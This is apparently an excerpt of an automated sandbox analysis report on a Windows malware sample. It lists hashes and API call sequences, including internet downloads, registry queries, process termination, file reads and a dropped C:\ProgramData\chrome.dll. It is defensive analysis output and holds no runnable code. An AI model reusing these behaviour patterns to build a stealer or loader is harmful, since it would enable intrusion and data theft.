                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                      • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                      • API String ID: 585553867-663540502
                                      • Opcode ID: c4dc864b1527832e556e274b88429a3fa33af83b17bcc90d903110eac0a74815
                                      • Instruction ID: a7782b1a890f85dd2b14f1b56c3394f1595a0abf7a98e138128d7282faebce2d
                                      • Opcode Fuzzy Hash: c4dc864b1527832e556e274b88429a3fa33af83b17bcc90d903110eac0a74815
                                      • Instruction Fuzzy Hash: CDA14571B001089FCB28EF64DD96AED77B6BF94300F50856DE80A5F252DB34DA05DB92
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 00F8FA1F
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00F8FA27
                                      • _ValidateLocalCookies.LIBCMT ref: 00F8FAB0
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00F8FADB
                                      • _ValidateLocalCookies.LIBCMT ref: 00F8FB30
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                      • Instruction ID: 11950466c67bb44d07fd4f4918f7618b3d80d458b0c7ac8746a3fcc5e1751f04
                                      • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                      • Instruction Fuzzy Hash: 2E41C331E00209EFCF14EF68CC81ADE7BB5BF49324F148165E818AB391D7359909DB91
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00F1501A
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F15021
                                      • InternetOpenA.WININET(00F30DE3,00000000,00000000,00000000,00000000), ref: 00F1503A
                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00F15061
                                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00F15091
                                      • InternetCloseHandle.WININET(?), ref: 00F15109
                                      • InternetCloseHandle.WININET(?), ref: 00F15116
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                      • String ID:
                                      • API String ID: 3066467675-0
                                      • Opcode ID: eb8e597565d37d768d42593efa48a5a92538480b2b445240496920fbb62dd221
                                      • Instruction ID: 0eaa49d8658b1b2d4aaa8804262b7bcde9c457f1377ce6a0cb2029cea36954af
                                      • Opcode Fuzzy Hash: eb8e597565d37d768d42593efa48a5a92538480b2b445240496920fbb62dd221
                                      • Instruction Fuzzy Hash: 64311AB4A00218EBDB24CF94DC85BDCB7B5AB48704F1081E9FB09A7280C7706EC59F98
                                      APIs
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00F285B6
                                      • wsprintfA.USER32 ref: 00F285E9
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00F2860B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00F2861C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00F28629
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                      • RegQueryValueExA.ADVAPI32(00000000,01D8E140,00000000,000F003F,?,00000400), ref: 00F2867C
                                      • lstrlen.KERNEL32(?), ref: 00F28691
                                      • RegQueryValueExA.ADVAPI32(00000000,01D8E0B0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00F30B3C), ref: 00F28729
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00F28798
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00F287AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 3896182533-4073750446
                                      • Opcode ID: aa195169eaae5e8edf0cf4e58dcee0414371efb65bd49b21023a77c26b734584
                                      • Instruction ID: b467c305ac7a2ee54ca4b8917a2d806b5ff90c447a79a264278e450d753d8e92
                                      • Opcode Fuzzy Hash: aa195169eaae5e8edf0cf4e58dcee0414371efb65bd49b21023a77c26b734584
                                      • Instruction Fuzzy Hash: A3212F7191122CABDB24DB94DC85FE9B3B8FB48700F0081E8E609A6180DF74AAC5CFD4
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F299C5
                                      • Process32First.KERNEL32(00F1A056,00000128), ref: 00F299D9
                                      • Process32Next.KERNEL32(00F1A056,00000128), ref: 00F299F2
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F29A4E
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F29A6C
                                      • CloseHandle.KERNEL32(00000000), ref: 00F29A79
                                      • CloseHandle.KERNEL32(00F1A056), ref: 00F29A88
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                      • String ID:
                                      • API String ID: 2696918072-0
                                      • Opcode ID: 12d446acf501497f02101abf47be200e9f713d61aca087ae78ff34298cdf2791
                                      • Instruction ID: 21a4f336fa131ab478ed22742500c520d5f6af211269a1d739da6af12455255b
                                      • Opcode Fuzzy Hash: 12d446acf501497f02101abf47be200e9f713d61aca087ae78ff34298cdf2791
                                      • Instruction Fuzzy Hash: 2C21ED75904318ABDB35DF95E888BDDB7B5BB48300F1041D8E509AB284D7789EC4DF90
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F27834
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F2783B
                                      • RegOpenKeyExA.ADVAPI32(80000002,01D7C400,00000000,00020119,00000000), ref: 00F2786D
                                      • RegQueryValueExA.ADVAPI32(00000000,01D8E110,00000000,00000000,?,000000FF), ref: 00F2788E
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00F27898
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: Windows 11
                                      • API String ID: 3225020163-2517555085
                                      • Opcode ID: 5eee0816a72f9e5e433311a03a49c1250925279dee930b022f97b28b7580ee2e
                                      • Instruction ID: 82eb35eac2ae964bea432fbc2a991f048a4e5233c56865736641e12ab05ed1f0
                                      • Opcode Fuzzy Hash: 5eee0816a72f9e5e433311a03a49c1250925279dee930b022f97b28b7580ee2e
                                      • Instruction Fuzzy Hash: CA014475E44305FBE714EBD4ED49FAD77B8EB44700F104064F6159A284D6709980DB90
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F278C4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F278CB
                                      • RegOpenKeyExA.ADVAPI32(80000002,01D7C400,00000000,00020119,00F27849), ref: 00F278EB
                                      • RegQueryValueExA.ADVAPI32(00F27849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00F2790A
                                      • RegCloseKey.ADVAPI32(00F27849), ref: 00F27914
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: CurrentBuildNumber
                                      • API String ID: 3225020163-1022791448
                                      • Opcode ID: c7b9c1b83fe31c5bd7cd8f9cac632070b27a524980a2e6093b9c0ee31768ec1d
                                      • Instruction ID: 84d262adbbc86ee4b27a95f4aa4d3d0b3ef86c100010634978dfa1c5471b25f8
                                      • Opcode Fuzzy Hash: c7b9c1b83fe31c5bd7cd8f9cac632070b27a524980a2e6093b9c0ee31768ec1d
                                      • Instruction Fuzzy Hash: DA0167B5E40309BFEB14DBD4DC4AFAE77B8EB04700F004594F615AB284DB749A40DB90
                                      APIs
                                      • memset.MSVCRT ref: 00F24325
                                      • RegOpenKeyExA.ADVAPI32(80000001,01D8D8A0,00000000,00020119,?), ref: 00F24344
                                      • RegQueryValueExA.ADVAPI32(?,01D8E308,00000000,00000000,00000000,000000FF), ref: 00F24368
                                      • RegCloseKey.ADVAPI32(?), ref: 00F24372
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F24397
                                      • lstrcat.KERNEL32(?,01D8E2F0), ref: 00F243AB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseOpenQueryValuememset
                                      • String ID:
                                      • API String ID: 2623679115-0
                                      • Opcode ID: 07da22401f551350e07874dd9826c0094edf77a195c423c617e7f74177b3b942
                                      • Instruction ID: d4f8b57709a642ad783025cd06e5abe0584c37731498304cc401a8546ecdb913
                                      • Opcode Fuzzy Hash: 07da22401f551350e07874dd9826c0094edf77a195c423c617e7f74177b3b942
                                      • Instruction Fuzzy Hash: 1441F8B29001086BDB28EBE0EC56FEE737DBB98300F404568B7254A0C5EF745AC88BD1
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F1A13C
                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F1A161
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00F1A181
                                      • ReadFile.KERNEL32(000000FF,?,00000000,00F1148F,00000000), ref: 00F1A1AA
                                      • LocalFree.KERNEL32(00F1148F), ref: 00F1A1E0
                                      • CloseHandle.KERNEL32(000000FF), ref: 00F1A1EA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                      • String ID:
                                      • API String ID: 2311089104-0
                                      • Opcode ID: 078eeeb1e73997d729f3108911cb1184afb53b977ce374633ab81d95209124c1
                                      • Instruction ID: aed26db1f956d1260d63e7d6e7cd22920bd3cc510c00df64d7a1831dff8178c0
                                      • Opcode Fuzzy Hash: 078eeeb1e73997d729f3108911cb1184afb53b977ce374633ab81d95209124c1
                                      • Instruction Fuzzy Hash: B431FAB4E01209EFDB14CFA4D885BEE7BB5AB48714F108158E911AB284D774AA81DFA1
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String___crt$Typememset
                                      • String ID:
                                      • API String ID: 3530896902-3916222277
                                      • Opcode ID: 20ec48164897fed65ca9e557834b4572bb96ffe6cfa5f3139a98ad85e4d5a720
                                      • Instruction ID: 0a72705e6dff1589aa37388067c4f7d03dcccb2f221de133d3577eb2724c447f
                                      • Opcode Fuzzy Hash: 20ec48164897fed65ca9e557834b4572bb96ffe6cfa5f3139a98ad85e4d5a720
                                      • Instruction Fuzzy Hash: FF41F6B15007AC5EDB318B24AC85FFF7BE8AB45704F1444E8E98A97182D2719A44EFA0
                                      APIs
                                      • lstrcat.KERNEL32(?,01D8E398), ref: 00F24A2B
                                        • Part of subcall function 00F28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F28F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F24A51
                                      • lstrcat.KERNEL32(?,?), ref: 00F24A70
                                      • lstrcat.KERNEL32(?,?), ref: 00F24A84
                                      • lstrcat.KERNEL32(?,01D7B8D8), ref: 00F24A97
                                      • lstrcat.KERNEL32(?,?), ref: 00F24AAB
                                      • lstrcat.KERNEL32(?,01D8D800), ref: 00F24ABF
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F28F20: GetFileAttributesA.KERNEL32(00000000,?,00F11B94,?,?,00F3577C,?,?,00F30E22), ref: 00F28F2F
                                        • Part of subcall function 00F247C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00F247D0
                                        • Part of subcall function 00F247C0: RtlAllocateHeap.NTDLL(00000000), ref: 00F247D7
                                        • Part of subcall function 00F247C0: wsprintfA.USER32 ref: 00F247F6
                                        • Part of subcall function 00F247C0: FindFirstFileA.KERNEL32(?,?), ref: 00F2480D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
